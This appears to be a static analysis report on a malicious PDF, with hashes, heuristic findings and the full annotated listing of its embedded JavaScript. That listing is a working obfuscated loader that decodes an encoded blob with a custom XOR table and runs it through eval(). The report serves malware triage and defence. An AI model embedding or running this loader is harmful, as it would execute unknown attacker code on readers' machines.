Malicious PDF — malware analysis report

Static analysis result for SHA-256 ee4a2931cf42bf6f…

MALICIOUS

PDF

7.8 KB · Created: 2008-31-20 53:85:00 (value as recorded in the PDF metadata; it is not a valid calendar date/time, so the /CreationDate field is either malformed or was mis-parsed — treat it as unreliable, and as a minor anomaly in its own right) · Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) — producer strings are metadata only and trivially forged · First seen: 2026-05-10
MD5: 6c9661e48deef3511d725b67c8367ac7 SHA-1: 91ce05bbd333d64cff3d4731d7423b09697d12a6 SHA-256: ee4a2931cf42bf6f5b03ca2c2746db8f5b70c9888a83f79c217b28aee3a59ce3
150 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell — unconfirmed: nothing in the static evidence below references PowerShell. What is actually observed is obfuscated JavaScript executed by the PDF reader (T1059.007 JavaScript); the second stage that eval() would run was not recovered, so a PowerShell mapping can only be confirmed by decoding that blob or by dynamic analysis.

The PDF contains embedded JavaScript built around several eval() calls. The script reconstructs a long opaque string (most of the 5.8 KB artifact) from hundreds of short concatenated literals, which defeats plain substring signatures; it then decodes that string with a custom table-driven 6-bit (base64-style) scheme, XORs every output byte with 177 (0xB1), and passes the result straight to eval() — i.e. the decoded text is executed as a second stage. Even the decoder's own statements (Math.ceil, Math.min, charCodeAt, String["fromCharCode"]) are assembled from split strings and eval()'d so that the API names never appear contiguously in the stream. This decode-then-eval staging has no plausible benign purpose in a document and is the basis for the malicious verdict; what the second stage does — whether it downloads anything (the two URLs listed below sit in document body text, not in the script) or exploits a reader vulnerability — has not been established statically and requires decoding the blob or detonating the sample.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 5

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    stream
    function XZB5HYBlORk() {var datfield = 'Mr'+'SBIxqeUXKjxOKe'+'Mc27L'+'yZ6Mm05IIachn8nMra6Lws62VWbMmG'+'B5NvEJNq0xvKqiIJ1k'+'N'+'sW'+'rt'+'GBsPq'+'c3g_ef'+'p202P8cMdKz2ba1MQq0'+'xvKqiIJ1kNsWrtGB'+'Lza1LOs6h'+'CqE'+'aGSR7Ir'+'Rmz'+'vQp006It_jELs1htCb'+'ows7d'+'c27'+'0'+'L45o'+'X_ettsz1VsqgTAUMJ06It'+'_jELs1htCb'+'ow'+'s7SPq0xv'+'KqiI'+'J1k'+'NsWrtGBLpS'+'6ywK'+'6IXWbuNhEsGSR7IrRmzCNIn8nM_S1f'+'y45Lxq0xvKqiIJ1k'+'NsWrtGBpP9UMr'+'a6Lws62VWb'+'MQ'+'D1U'+'te5nyiWs'+'N9Q'+'MYK7xIW5MuGBE'+'CsR'+'xP9'+'X …
    endstream
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://phpnet.us/byet300x250.php — in PDF document text
    • http://ad.foxnetworks.com/st?ad_type=pop&ad_size=0x0&section=204717&banned_pop_types=28&pop_times=5&pop_frequency=86400 — in PDF document text
    Both URLs were found in the document's body text, not in the JavaScript stream, so neither is evidenced as the second-stage source; they look like free-hosting / ad-network URLs carried over from page content and should be treated as low-confidence indicators.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0013_001.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x38F | 5819 bytes
SHA-256: d75750ee0b1ecd5a4c09c8184c48fc3ac421dc073de230fe25946c46c64bb091
Detection
ClamAV: No threats found (expected for a string-split, custom-encoded script that no signature has been written for; a clean result from a single signature engine does not weaken the heuristic verdict above)
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script (the listing below ends at the closing brace of XZB5HYBlORk(), so the artifact appears to be shown in full; the line breaks that fall inside the long quoted string are most likely display wrapping, since a bare newline is not valid inside a JavaScript string literal)
// Carved /JS object 13 (see "Extracted artifacts" above).  Analyst annotations
// only: every token below is reproduced from the carved stream; comments and
// line breaks outside the string literal are the only additions.
//
// Stage 1: XZB5HYBlORk() assembles `datfield`, a long opaque string, from
// hundreds of short concatenated literals (string splitting, so no contiguous
// signature exists), then hands it to zO3XCyYZA().  The string appears to be
// drawn only from the ASCII '0'..'z' range that the decoder table covers, so it
// is an encoded payload rather than readable script.
//
// Stage 2: zO3XCyYZA() is a custom base64-style decoder (see inline comments):
//   - `tp` is a 75-entry lookup table indexed by charCode - 48 ('0'..'z');
//   - four 6-bit symbols -> three bytes, packed LSB-first;
//   - every output byte is XORed with 177 (0xB1);
//   - the decoder's own statements are built from split strings and eval()'d
//     so Math.ceil / Math.min / charCodeAt / String["fromCharCode"] never
//     appear contiguously;
//   - the decoded text is finally passed to eval(), i.e. executed.
//
// What the decoded stage does is NOT visible here.  Recover it by running the
// decoder in an isolated JS interpreter with the final eval() replaced by a
// dump of the decoded string; the decoder needs no Acrobat/PDF-reader API.
function XZB5HYBlORk() {
  // Encoded second stage, split into short literals.  The newlines that fall
  // inside this literal in the listing are display wrapping, not code.
  var datfield = 'Mr'+'SBIxqeUXKjxOKe'+'Mc27L'+'yZ6Mm05IIachn8nMra6Lws62VWbMmG'+'B5NvEJNq0xvKqiIJ1k'+'N'+'sW'+'rt'+'GBsPq'+'c3g_ef'+'p202P8cMdKz2ba1MQq0'+'xvKqiIJ1kNsWrtGB'+'Lza1LOs6h'+'CqE'+'aGSR7Ir'+'Rmz'+'vQp006It_jELs1htCb'+'ows7d'+'c27'+'0'+'L45o'+'X_ettsz1VsqgTAUMJ06It'+'_jELs1htCb'+'ow'+'s7SPq0xv'+'KqiI'+'J1k'+'NsWrtGBLpS'+'6ywK'+'6IXWbuNhEsGSR7IrRmzCNIn8nM_S1f'+'y45Lxq0xvKqiIJ1k'+'NsWrtGBpP9UMr'+'a6Lws62VWb'+'MQ'+'D1U'+'te5nyiWs'+'N9Q'+'MYK7xIW5MuGBE'+'CsR'+'xP9'+'XMP2'+'cl'+'p'+'sEgxiBlpZnM'+'rS'+'BIxq'+'0ev'+'0W3v_qwOS'+'6fnK7SP96LyZ5gIs5@'+'Nq7@gKRm'+'uiE@gKRm'+'ui'+'E@gKRmuiE@gKEby04@gDEmge4@g4Rxpvn@gKnl_vn@gKnlPAE@gSW'+'bwi'+'E@gSWI'+'u'+'iE@gSWU'+'L'+'v4@gSW'+'9PAR@g4W'+'byC4@g4WbL0W@'+'gKnUOeW@gKWbtAW@gSW'+'by0W@g4Rfg0W@gSW'+'m'+'m0W@gSnbL2R'+'@gKRIrCE@gSnbL2'+'R@g4RB'+'yCR@'+'gSWbxiE@'+'gSWby'+'04@g4Rfg0W@g44APiE@g4RHQi'+'R@gS'+'WHmv'+'E@'+'gKEPPi'+'E@gSWbIA'+'E@gSWb'+'y0W@gS45'+'LeR@g4'+'4A'+'g0'+'4@gD'+'RPQiR@'+'g4R3m'+'AE'+'@gKE'+'PgvE@gS'+'WbIeW@gSWb'+'y0W@gS45LeR@'+'g44AgCR@gD45'+'NiR@gS'+'ElgeW@gKE'+'P'+'_2W@'+'gSWbx2W@gSWby0W@gS'+'45L'+'eR@g44'+'AgCE@gKElQiR@gKEbvAE@gKE'+'PQeW@'+'gSWb'+'we4@gS'+'Wby0W@g'+'S4'+'5Le'+'R@g44Ar0W@g4'+'EBN'+'iR'+'@gKE5XeR@gKEP'+'giR@gSWb'+'vAn@g'+'SWby0W@gS45LeR@gS4b'+'L04@gKWPreW@gSn5vi4@'+'g4'+'Rx'+'m'+'AR@g4'+'WPm'+'v4@g'+'SW9PeR@gSWbyvW@g44Hg0W@gS'+'n5LeR@'+'g4Rfp04@gSWUIv4@'+'gSWBNAR@g4Rf_0R@g4WP_v4@'+'gKEP_vn@'+'gSWbL'+'2R@gSW'+'b'+'y0W@gK'+'nP_0W@g4W3u'+'vn@gSnbwLE@gDR9Pi'+'R@gS'+'Wby0W@g4Rxg0W@'+'g'+'4Wmm'+'v4@g'+'4E5L'+'2R@g4Eb'+'L'+'i4@g4R'+'x_0W@gD4bIv4@gSElQiR@gSWby0W@g44by0W@gS45L2R@gKn3r04'+'@g'+'44xgLW@'+'g445L2R@'+'gKE'+'PrCR@gSWbNAW@g'+'SWby0W@gS'+'45yC4@g4E9p0W'+'@g4'+'4mg0W@gD4HnA'+'E@g4E9QA4'+'@gSWUI'+'0W'+'@gK'+'n5Xi'+'R@gS'+'Wby0'+'W@gSn5I2'+'E@g4R'+'f'+'p0W'+'@gSWmmv4@'+'g'+'SWBNAR@g4R'+'f'+'_0R@g4WP_v4'+'@gS'+'4bx'+'iR'+'@gSWby0W'+'@gKn'+'3g0W'+'@g44PgLn@gS45yC'+'4@gKW'+'c'+'w04'+'@g44'+'c'+'w'+'2R@gSEl_C'+'4@gD4bXA4@g44c'+'v0W@gS'+'4'+'5'+'L2R@gKn3rCE@g44xgv4@g'+'445L
+'2R@'+'gKEPrCR'+'@g'+'SWbwC4@'+'gSWby0W'+'@'+'gSWb'+'NA'+'R@gSn5I2E@'+'g4Rfp0W'+'@g'+'SWPmv4'+'@gSW1NAR@g4Rf_0R@g4WP_v'+'4@g4W'+'bxiR@gSWby0W@gKn3g0W@g4Rfm2E@g4WbIv'+'4@gSWBNAR@g4Rf_0R@g4WP'+'_v'+'4@'+'gSWbxiR@g'+'SWby0W@'+'gS4'+'By0W@g441vL'+'R@gKEByC4@gKEByC4'+'@gKEByC4'+'@gKEB'+'yC4@gKEmri4@g443g04@g4Rf_C4@gKE1w'+'AR@g4'+'41'+'I2n@gKEbI2E@'+'g4'+'Rf_v4@g4RfPiE@gSWPneE@g44I'+'r'+'2R@g4'+'4AgCE@gSncL2R@g4RfuCE@g4WHne'+'4@gSWcXiR@g44Ami4'+'@gS'+'nAr2R'+'@g'+'S'+'Wcw0'+'W@g'+'KWcIi4'+'@g'+'S4x_eR@gKRI'+'mv'+'W@g4EcyC4@gKWcvvn@gSWlmAn@g4WbyAE@gSE1t'+'vR'+'@gSWPne4@g4EH_'+'AW@gSWcy0'+'E@gS4bI2W@gSEBx2R@gSEHu'+'LR@gS'+'n'+'5vvE@'+'g44'+'3PA4@g'+'KE'+'fr2R@g443r'+'2R@'+'g'+'SW'+'cw0'+'4@gKnApeE@g'+'SWmr2R'+'@g4Rf'+'mLR@g4Wm_v'+'R@gDEIgC4@gS'+'WUL2R@'+'gSWcL2R@g44H_A4@g4E1v0E@'+'gSWbyCR@gSEUxiR@gS'+'ElmAE@'+'g445I2E@gS'+'4m_L'+'W@g'+'S4'+'lm0E@gSWbI'+'vE@'+'gDRfr'+'2n@'+'gDRld2R@g'+'4EbwA4@g4RUveW@gDRIrAE@gDEfri4'+'@gDExpi'+'E@g4EBweE@g4'+'Rc'+'w2E'+'@g4EBO2n@g4R3'+'rA'+'W'+'@g4EbO2R'+'@g4Rb'+'Li4@g4'+'RfrAE@g'+'D'+'Rl'+'_AW@'+'g'+'DRl'+'r2n@g4'+'RApeW@gDE1L2R@gDElpeE'+'@'+'gDEHpeR'+'@gDRm_'+'eR@g'+'4RcO2E@gDEfp2Wyn8nMrSBIxhqTyie'+'Q'+'OvRPCSnIP9XMP2cfP2ElP2EpPq'+'6FvK'+'7oCvjl'+'gvE@y'+'LciXC6rbL7SPq0ev0W3v_'+'qwOS6fn'+'4NsyWbutKzMGh7IY'+'2'+'7xIW5MGSR7'+'IrR'+'mzL7'+'SPhqTyi'+'eQOvRPCSn'+'I'+'P9N'+'MQh'+'qVX'+'rEBIA1BNS'+'jeODbWThE9w2n2Y27'+'xIW5MJ06It_jELs1'+'ht'+'Cbows7SP96L'+'yZ5gIs5@N'+'q7@gSn'+'ln2E@gSnln2Eyn8nMJ06It_j'+'ELs1'+'htCbows7SP9e'+'gI'+'L'+'JHjLQ0L45o'+'X_ett'+'s'+'z1'+'Vsqgbh7'+'w'+'yAqEtiE'+'WX8nMrSBIxq6Tv'+'4'+'jzv_12NS'+'6LtK7SPhQ'+'owaeOteRM'+'ch7l'+'QKRlP2El'+'PAQruJj3pGqz'+'yi6w'+'XeEpPq1rvK7'+'hrSB'+'Ix'+'95EOSW7U'+'2Epm'+'SePyvqar'+'4jICGWXyaz9y4bfTA5'+'EOSW'+'7T8Q2'+'P8c'+'M_J4ANJ6PxGjHIG'+'6By_'+'VMc2'+'70L45oX_ettsz1Vsqg'+'x'+'8'+'QM'+'JvJULv6XyJc'+'PyKRAT27Sx9UMra'+'6Lws62V'+'WbMJ'+'W6qI4WHIA'+'qIyazr'+'wv'+'Ehnh'+'7'+'pxq'+'6FvK75UvnLL'+'K7SP9'+'Blx4NxXa1PyW5NyW5mXZb'+'L0h6rwr6IXWbuN'+'9QpP944Xe'+'b'+'x'+'x'+'9XMmv0AJW6L_S1lbaBgys'+'Qrz'+'
rWrdsNy_9'+'QpPq6F'+'vK7Rw0eIrD'+'0PCs7SPqb@OK75v45FXKQ'+'5UvnLL4NgNa'+'BIIL6hPAQsmv0AJW6Lpsz'+'FvS'+'4f'+'N9E2'+'z94'+'4Xebx08BhIW55tKQI'+'n9QpP'+'9ztxhQhPG'+'4Xve6JO4zYxAVM'+'cAXMQ27tr'+'h7hQ'+'hecvJExVC6OT_EDx9XS'+'P9EMrqoMPG4Xve6JO4zYvA'+'VMz'+'27Inh7abK7'+'R'+'w0e'+'IrD'+'0PCZjHcr7aP9E2nh7abK7'+'hPG4'+'Xve6JO4zYxA'+'VMcA'+'XMd2'+'7trh7Rw0'+'e'+'IrD0PCZjHcr7aP9E'+'2P'+'hUaxhQ'+'Rw0eIrD0'+'P'+'CZj'+'lcr'+'7'+'aP8R2nh7'+'pxhcuvLRI'+'w'+'_RzbsQ2Y27xI'+'W5MuJ'+'11XeqoXDq9xS4ty'+'s7SP96L'+'yZ5gI'+'s5'+'@'+'N'+'q7@gKEgxiB@g'+'KEgxiByn8nMdKz2b'+'a1huJ11'+'Xeq'+'o'+'XDq9xS'+'4tyWNsyW'+'b'+'utKzMz27fuAn3_AQ'+'MuJ11XeqoXDq'+'9xS4tys7dc2'+'7oLsWArrqAOrclI01@T27fNazm08BrbsbFv'+'Z'+'efVW'+'5'+'@'+'x'+'9XMpCbsbaBy08Brbsb@ws6B'+'UaB2baJ'+'LL'+'Zb'+'hY'+'D53vWz'+'wPq7yz9'+'bmOWnMuJ11XeqoXDq9xS4t'+'yaU2Y27Sx9UMJW6qI4WHIAqIyazrwvEh'+'n8n';

  // ---- Stage 2: decoder.  Tokens unchanged; whitespace/comments added. ----
  function zO3XCyYZA(U7OYphPUvX1){
    // 75-entry lookup table indexed by (charCode - 48), i.e. ASCII '0' (48)
    // through 'z' (122).  The 64 symbols 0-9 A-Z a-z '@' '_' map to a
    // permutation of 0..63 (a shuffled base64 alphabet); the remaining ASCII
    // in that range (':'..'?', '['..'^', '`') decode as 0.
    var tp = '63@53@24@4@60@48@49@36@41@9@0@0@0@0@0@0@20@8@52@47@44@32@16@46@0@3@62@28@31@17@39@27@6@38@33@12@43@51@59@61@35@42@45@0@0@0@0@14@0@13@55@50@26@56@5@18@25@40@58@21@1@2@34@37@10@57@30@29@23@22@15@11@7@19@54';
    // ywjFqJLKBb: literal 0 (loop bound / initial value).  YWLMh215hP: input
    // chars still to process.  qxfiWFtVqzuP: 1024-char chunk size.
    // ES01MerLYGAA: decoded output.  LhRocKftY: read cursor.  vorATw: current
    // bit shift.  viNFjj: bit accumulator.  d6TrGewkLO: parsed table.
    var ywjFqJLKBb=0, YWLMh215hP=U7OYphPUvX1.length, qxfiWFtVqzuP=1024, coJWMKvsrGE, gFczf6k, ES01MerLYGAA='', LhRocKftY=ywjFqJLKBb, vorATw=ywjFqJLKBb, viNFjj=ywjFqJLKBb, d6TrGewkLO=Array();
    d6TrGewkLO = tp.split('@');
    // eval(...) => gFczf6k = Math.ceil(YWLMh215hP / qxfiWFtVqzuP)
    // (number of 1024-char chunks).  "Math.ceil" is split across literals so
    // the identifier never appears contiguously in the stream.
    for(eval('gFczf6k=Ma'+'th.'+'ce'+'il(YWLMh215hP'+'/qxfiWFtVqzuP)');gFczf6k>ywjFqJLKBb;gFczf6k--){
      // eval(...) => coJWMKvsrGE = Math.min(YWLMh215hP, qxfiWFtVqzuP):
      // symbols in this chunk.  Bit state carries across chunk boundaries.
      for(eval('coJWMKvsrGE=M'+'ath'+'.m'+'in(YWLMh215hP,'+'qxfiWFtVqzuP)');coJWMKvsrGE>ywjFqJLKBb;coJWMKvsrGE--,YWLMh215hP--){
        // eval(...) => viNFjj |= (d6TrGewkLO[U7OYphPUvX1.charCodeAt(LhRocKftY++)-48]) << vorATw
        // Each symbol contributes 6 bits at shift 0, 6, 4, 2 in turn
        // (LSB-first), so four input symbols yield three output bytes.
        eval('viNFjj|'+'=(d6TrGewkLO['+'U7OYphPUvX1.'+'cha'+'rCo'+'de'+'At(LhRocKftY+'+'+)-48])<'+'<vorATw');
        if(vorATw){
          // eval(...) => ES01MerLYGAA += String["fromCharCode"](177^viNFjj&255)
          // '&' binds tighter than '^': output byte = (accumulator & 0xFF) XOR 0xB1.
          eval('ES01MerLYGAA+'+'=S'+'tri'+'ng['+'"fro'+'mCha'+'rCod'+'e"](177^'+'viNFjj&'+'25'+'5)');
          viNFjj>>=8;   // drop the emitted byte, keep the leftover high bits
          vorATw-=2;    // next shift: 6 -> 4 -> 2 -> 0
        } else {
          vorATw=6;     // first symbol of a 4-symbol group: no byte emitted yet
        }
      }
    }
    // The decoded text is executed, not displayed.  To recover the second
    // stage for triage, run this function in an isolated JS interpreter with
    // this line replaced by a dump of ES01MerLYGAA; the decoder uses only core
    // JS (Math, String, Array, eval) and no Acrobat/PDF-reader API.
    eval(ES01MerLYGAA);
  }
  // Decode-and-execute runs whenever XZB5HYBlORk() is called.  What triggers
  // that call (e.g. an /OpenAction pointing at /JS object 13) is not shown in
  // this listing -- TODO confirm from the PDF catalog / Names tree.
  zO3XCyYZA(datfield);
}